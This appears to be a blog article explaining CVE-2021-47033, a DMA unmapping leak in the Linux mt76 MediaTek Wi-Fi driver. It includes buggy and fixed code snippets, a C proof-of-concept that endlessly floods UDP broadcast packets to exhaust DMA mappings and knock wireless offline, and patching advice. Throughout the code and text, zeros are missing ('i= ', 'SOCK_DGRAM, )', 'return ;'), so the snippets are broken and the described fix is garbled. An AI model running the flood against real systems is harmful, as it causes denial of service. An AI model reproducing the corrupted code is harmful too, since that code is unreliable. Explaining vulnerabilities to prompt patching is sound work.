CVE-2021-47033 - Understanding and Exploiting a DMA Unmapping Bug in the Linux Kernel mt76 Driver

In mid-2021, the Linux kernel was patched to fix a subtle yet significant memory leak issue affecting the mt76 wireless driver, specifically for the mt7615 chipsets. This issue, identified as CVE-2021-47033, deals with the improper handling of Direct Memory Access (DMA) resources during wireless frame transmission. Improper DMA unmapping could potentially lead to system instability or, in some scenarios, open a door for system resource exhaustion.

This article breaks down CVE-2021-47033 in simple terms—what it is, why it matters, and how an attacker could, in theory, take advantage of this vulnerability if the kernel is not patched. We'll include code snippets from both the buggy and fixed versions, and guide you to official references for deeper reading.

What is CVE-2021-47033?

CVE-2021-47033 refers to a flaw in the Linux kernel’s mt76 driver for MediaTek wireless chipsets, especially the mt7615. The driver is responsible for sending and receiving network packets in Wi-Fi devices running Linux.

The problem:
When the kernel hands over a Wi-Fi packet to the chip for transmission, it creates a DMA mapping—a kind of “map” that lets the device access computer memory directly for quick transmission.
But, once the packet is transmitted, that DMA mapping must be cleaned up (unmapped); otherwise, the system may run out of mapping slots, leading to memory leaks and system instability.

In the vulnerable driver, only part of the allocated DMA memory was unmapped after packet transmission—leaving the first pointer (“txp[]”) mapped forever.

Original Vulnerable Code

In drivers/net/wireless/mediatek/mt76/mt7615/mac.c, inside the packet transmission routine, something like the following code handled DMA memory cleanup:

static void mt7615_txp_skb_unmap(struct mt7615_dev *dev, struct mt76_queue *q,
                                 struct mt76_queue_entry *e)
{
    struct mt7615_txp_ptr *txp_ptr = (struct mt7615_txp_ptr *)e->skb->data;
    int i;

    for (i = 1; i < txp_ptr->num; i++)  // Starts from 1!
        dma_unmap_single(dev->mt76.dev, txp_ptr->ptr[i], ...);
}

The bug?
It starts the loop at i = 1, which skips the unmapping of txp_ptr->ptr[], the first and often the main DMA allocation per transmission. Over time, this mistake fills up the system’s DMA mappings, eventually leading to failure.

The Fix

The fix is simple: just start at i= so all, including the first, pointers get unmapped.

// Corrected code snippet
for (i = ; i < txp_ptr->num; i++)
    dma_unmap_single(dev->mt76.dev, txp_ptr->ptr[i], ...);

Reference Link:
Linux kernel commit fixing CVE-2021-47033

Why Does This Matter?

Most DMA memory leaks are not directly exploitable for privilege escalation, but they can cause Denial-of-Service (DoS). By deliberately transmitting a lot of packets, a local user (even one without special privileges) can fill up all available DMA mapping slots. When these run out, new packets cannot be transmitted and the driver will fail, possibly taking down the wireless subsystem or even causing kernel panics.

This means anyone with access to the network device (like a regular user or a process in a container) could exhaust this resource and take the Wi-Fi offline on a server or router.

Attack Scenario

A local user or a remote attacker who can access Wi-Fi (say in a shared server or router with shell access) could write a small program to flood the driver with outgoing packets.

Proof-of-Concept (PoC) Sketch

// Not a direct DMA exploit, but this stresses the system
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

// Send many UDP packets to exhaust DMA mapping entries on a wireless interface
int main() {
    int sock = socket(AF_INET, SOCK_DGRAM, );
    if (sock < ) { perror("socket"); return 1; }

    struct sockaddr_in addr;
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(9999);
    inet_pton(AF_INET, "192.168.1.255", &addr.sin_addr);

    char buffer[140] = {};
    while(1) {
        sendto(sock, buffer, sizeof(buffer), , (struct sockaddr*)&addr, sizeof(addr));
        // sleep() -- no delay, maximum stress!
    }
    close(sock);
    return ;
}

On a vulnerable kernel with lots of these running, the wireless driver will run out of DMA mappings and stop working, potentially requiring a reboot.

Update your kernel!

Make sure your system is running a kernel version that has the fix for CVE-2021-47033 (check mt76 driver commit logs if you build your own).

Monitor logs for DMA errors:

Look for DMA resource exhaustion messages in your system logs, which may indicate an unpatched driver or an ongoing attack.

Learn More

- CVE-2021-47033 at cve.mitre.org
- Kernel.org patch commit
- mt76 Linux driver source

Conclusion

CVE-2021-47033 is an example of how even little pointer mistakes in kernel drivers can cause broad instability or denial-of-service. If you're a Linux kernel user or packager, especially on devices using MediaTek wireless chips, patching promptly is crucial—even for bugs that seem “just” to leak memory, since they can often be the key to more serious attacks.

Stay updated, use trusted distributions, and keep an eye on wireless driver updates!

Timeline

Published on: 02/28/2024 09:15:39 UTC
Last modified on: 12/12/2024 15:39:46 UTC